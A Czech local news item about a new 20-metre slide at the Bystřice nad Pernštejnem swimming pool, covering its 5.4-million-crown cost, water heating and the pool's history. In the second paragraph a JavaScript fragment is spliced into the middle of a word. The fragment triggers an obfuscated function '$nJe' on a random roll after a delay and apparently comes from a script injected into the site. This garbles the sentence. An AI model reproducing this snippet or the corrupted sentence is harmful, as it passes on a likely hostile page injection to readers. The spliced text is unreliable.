Rainbow page separator

Bazény a další atrakce na koupališti doplnila nová skluzavka

Čtvrtek, 24. června 2021

Bystřice nad Pernštejnem / Dvacetimetrová skluzavka byla nainstalována na bystřickém koupališti. S jejím uvedením do provozu včetně samotného otevření areálu koupaliště se počítá každým dnem, aby nová atrakce mohla návštěvníkům sloužit již tuto letní sezonu. Na skluzavku bylo v letošním rozpočtu města vyčleněno 5,4 milionu korun a k tomu ještě sto tisíc korun na výměnu filtrace.
V předešlých dnech se již provádělo přihřívání vody v bazénech, ke kterému se standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardně využívá zbytkové teplo z biomasové kotelny. V dětském bazénu bývá voda teplá kolem 26°C, v rekreačním bazénu 25°C a v nejchladnějším plaveckém bazénu dosahuje obvykle teploty mezi 22 až 24°C.
Koupaliště v Bystřici, které bylo uvedeno do provozu v červnu roku 2002, zahrnuje dětský, relaxační a plavecký bazén a také brouzdaliště pro nejmenší s vodním hřibem. Další nabídka čítá bufet, dvě hřiště na plážový volejbal, dětský koutek, trampolínu a stůl na stolní tenis. Několik let po otevření areálu se zvažovalo i pořízení tobogánu, později ale bylo od záměru upuštěno. Skluzavka byla v plánu minimálně deset let.